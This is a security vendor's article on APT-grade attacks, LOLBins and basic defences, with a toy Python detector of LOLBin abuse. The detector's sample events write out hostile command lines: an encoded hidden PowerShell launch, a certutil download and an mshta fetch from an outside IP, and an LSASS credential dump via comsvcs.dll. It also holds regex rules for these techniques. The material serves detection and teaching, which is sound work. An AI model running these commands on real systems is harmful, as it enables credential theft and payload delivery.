Cybercriminals favor cost-effective attacks on vulnerable organizations that will yield a healthy profit, and they are more skilled than ever. As a result, the majority of IT security incidents still stem from easily performed attacks.
According to one of our incident response analytics reports, 63% of investigated attacks were caused by insufficient patch management and bad password policy, which shows that a large number of companies still have problems with basic security controls. It’s no wonder, then, that cybercrime is so profitable: a Deloitte study found that adversaries can execute a cyberattack for as little as $34 per month with a net revenue of $25,000.
These figures create the impression that organizations with mature security programs are safe and of no interest to intruders, but as we have seen over time, that’s simply not true. Risk factors like human error and the complexity of the environment can offer an opening for cybercriminals in even the most secure infrastructure. Another alarming issue: organizing and executing a high-quality, APT-grade attack has become easier, which makes such attacks more profitable for cybercriminals.
Defining an APT-grade attack
Traditionally, advanced persistent threats (APTs) are very selective. An APT mainly aims at high-value targets such as national institutions or enterprises of national importance, and it tries to stay unnoticed for a prolonged period in order to gather valuable strategic information or to sabotage critical infrastructure. APTs are often costly to their victims, but because of the intelligence focus it is difficult to express the damage in monetary terms.
Today’s non-traditional “APT-grade” attacks use an APT-style toolkit that can cause tremendous impact, but these attacks are not the same as the traditional APTs conducted by nation-states. APT-grade intruders have more practical objectives and are less concerned with intelligence and intellectual property. Leaked APT tactics, techniques, and procedures (TTPs) help cybercriminals achieve quick and measurable profit goals, such as stealing money or collecting a ransom. That’s why APT-grade adversaries are not so picky about their targets. The advanced TTPs these threats employ significantly complicate detection and response for defenders, so all kinds of organizations are at risk.
How does the githubification of crimes improve the profitability of attacks?
Today, even less advanced cybercriminals can easily obtain APT tools and conduct complex, discreet attacks because of githubification. This term describes a community-based approach in infosec that speeds up learning for defenders: information security specialists learn together and share experience, tools, and skills, so that each of them reaches expert level faster than they could alone.
Unfortunately, adversaries benefit from the same process. Their skills compound in the same way, so that every attacker can operate at the level of the best attacker. Bad actors find this approach time- and cost-efficient because it lets them reuse existing instruments and techniques. Instead of writing a new tool that an endpoint protection product would detect automatically, cybercriminals learn from each other how to carry out attacks that go unnoticed. This applies especially to fileless attacks, where the adversary’s code resides only in the memory of a legitimate system process rather than in a file on disk that a scanner could inspect.
Recent reports also found that almost half of all incidents in 2020 involved the use of existing OS tools known as Living Off the Land Binaries (LOLBins), well-known offensive tools from GitHub such as Mimikatz, AdFind, and Masscan, and specialized commercial frameworks like Cobalt Strike. LOLBins are especially popular in high-severity incidents, which are usually human-driven (hands-on-keyboard) and cause the greatest damage.
Because LOLBins are legitimate, signed components of the operating system, they provide the perfect disguise for malware aimed at infiltrating a company’s infrastructure, and their execution gives artificial intelligence (AI)-based detection very little to key on. AI looks for similarity with activity it has already seen, while adversaries keep inventing something new and unique. AI-based technologies are often very helpful and reduce IT security costs, especially by filtering out false positives, but high-profile malicious activity still often goes undetected by fully automated solutions. Human analysts are still needed to detect human-driven malicious activity.
How businesses can cope with these types of attacks
What actions can companies take to protect from this growing threat and reduce the impact of cybercrimes? Here are the basic elements of a cybersecurity program:
- Train the staff. Make sure that employees have a clear understanding of the information security policy and know what risks a violation brings. Do this by implementing security awareness training.
- Patch frequently. In most cases, attackers use old, unpatched vulnerabilities to penetrate the infrastructure. That’s why consistent patch management has become a must-have for all organizations. This includes tracking vulnerability advisories from software vendors, scanning the network for unpatched systems, and keeping operating systems up to date.
- Combine different tactics to detect threats. Even a complex attack consists of simple steps and techniques, and detecting a single technique can reveal the whole attack chain. Different detection technologies find different adversarial techniques, so maintaining a variety of security technologies raises the chances of detection. At the very least, companies should use an endpoint protection platform and a network intrusion detection system.
- Arm the SOC team with relevant skills and tools. For instance, red teaming exercises have to simulate realistic, complicated attacks that leverage the latest adversarial tactics, such as new evasion techniques that abuse the .NET Common Language Runtime (CLR), and provide a clear picture of the company’s operational security status.
- Deploy managed detection and response (MDR) services. For companies with a lower cybersecurity maturity profile, this type of service can stand in for an in-house SOC, as it offers both automated and manual threat detection, which is essential against fileless attacks. More advanced companies can still benefit from MDR because it adds another layer of telemetry review and expert evaluation of incidents.
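The two points above about LOLBins and about combining detections (a single detected technique can expose the whole chain) are easier to see with a concrete, if toy, detector. The following is an added example, not code from Kaspersky or from this article: it runs a handful of rules modelled on publicly documented LOLBin abuse patterns over constructed Sysmon-style process-creation events, then correlates hits per host so that one ambiguous hit (an administrator using certutil legitimately, a single mshta launch) stays quiet while several distinct techniques within a short window on one host raise an alert. The event format, host names, command lines, regexes and thresholds are all assumptions for illustration and would need tuning in a real environment.

```python
"""Toy endpoint detection over constructed Sysmon-style process-creation events.

Added example for illustration only; not code from Kaspersky or the article.
Event schema, hosts, command lines and thresholds are assumptions. Rules follow
publicly documented LOLBin abuse patterns; tune them to your environment.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    host: str
    parent: str   # parent image basename, lower-case
    image: str    # process image basename, lower-case
    cmdline: str  # full command line


# One rule per technique: (name, image regex, parent regex or None, cmdline regex or None).
# A single hit is weak evidence; several distinct hits on one host are strong.
RULES = [
    ("office_spawns_shell",
     r"^(powershell|cmd|wscript|cscript|mshta)\.exe$", r"^(winword|excel|powerpnt)\.exe$", None),
    ("powershell_encoded",
     r"^powershell\.exe$", None, r"(?i)\s-(e|ec|enc|encodedcommand)\s"),
    ("certutil_download",
     r"^certutil\.exe$", None, r"(?i)-urlcache\b.*https?://"),
    ("mshta_remote_script",
     r"^mshta\.exe$", None, r"(?i)(https?://|javascript:|vbscript:)"),
    ("regsvr32_squiblydoo",
     r"^regsvr32\.exe$", None, r"(?i)/i:https?://.*scrobj\.dll"),
    ("lsass_minidump",
     r"^(rundll32|procdump(64)?)\.exe$", None, r"(?i)(comsvcs\.dll.*minidump|-ma\s.*lsass)"),
]


def match_rules(ev: Event) -> list[str]:
    """Return the names of every rule the event matches, in RULES order."""
    hits = []
    for name, img_re, parent_re, cmd_re in RULES:
        if not re.search(img_re, ev.image):
            continue
        if parent_re and not re.search(parent_re, ev.parent):
            continue
        if cmd_re and not re.search(cmd_re, ev.cmdline):
            continue
        hits.append(name)
    return hits


def detect(events: list[Event], window: timedelta = timedelta(hours=1),
           min_techniques: int = 2) -> dict[str, list[str]]:
    """Correlate hits per host: alert when at least `min_techniques` distinct
    techniques fire within `window`. Returns {host: sorted technique names}."""
    per_host: dict[str, list[tuple[datetime, str]]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        for name in match_rules(ev):
            per_host.setdefault(ev.host, []).append((ev.ts, name))
    alerts: dict[str, list[str]] = {}
    for host, hits in per_host.items():
        for i, (t0, _) in enumerate(hits):          # hits are time-ordered
            names = {n for t, n in hits[i:] if t - t0 <= window}
            if len(names) >= min_techniques:
                alerts[host] = sorted(names)
                break
    return alerts


# Constructed sample telemetry (not real logs).
T = datetime(2021, 3, 1, 9, 0)
SAMPLE_EVENTS = [
    # WS01: macro -> encoded PowerShell -> certutil download -> LSASS dump via comsvcs.dll
    Event(T, "WS01", "winword.exe", "powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    Event(T + timedelta(minutes=2), "WS01", "powershell.exe", "certutil.exe",
          "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\\Users\\Public\\a.dll"),
    Event(T + timedelta(minutes=9), "WS01", "cmd.exe", "rundll32.exe",
          "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Users\\Public\\l.dmp full"),
    # WS02: benign administrative use of the same binaries; nothing should fire
    Event(T, "WS02", "cmd.exe", "certutil.exe", "certutil.exe -hashfile C:\\tools\\setup.msi SHA256"),
    Event(T + timedelta(minutes=1), "WS02", "explorer.exe", "powershell.exe",
          "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    # WS03: a single suspicious hit, below the correlation threshold
    Event(T, "WS03", "explorer.exe", "mshta.exe", "mshta.exe http://203.0.113.10/p.hta"),
]

if __name__ == "__main__":
    for host, techniques in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(techniques)}")
```

Run as-is it alerts only on WS01, listing four distinct techniques; the same binaries on WS02 produce no hits, and the single mshta launch on WS03 is recorded but not escalated. In practice the endpoint hits would be joined with network telemetry (the download and the beaconing) from a separate sensor, which is the point of keeping more than one detection technology.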
Taking this information into consideration, it’s important for organizations to get back to security basics and minimize the human risk factors behind security incidents. By implementing proper cyber hygiene, organizations will be better equipped to handle costly APT-grade attacks.
Rob Cataldo, North American Managing Director, Kaspersky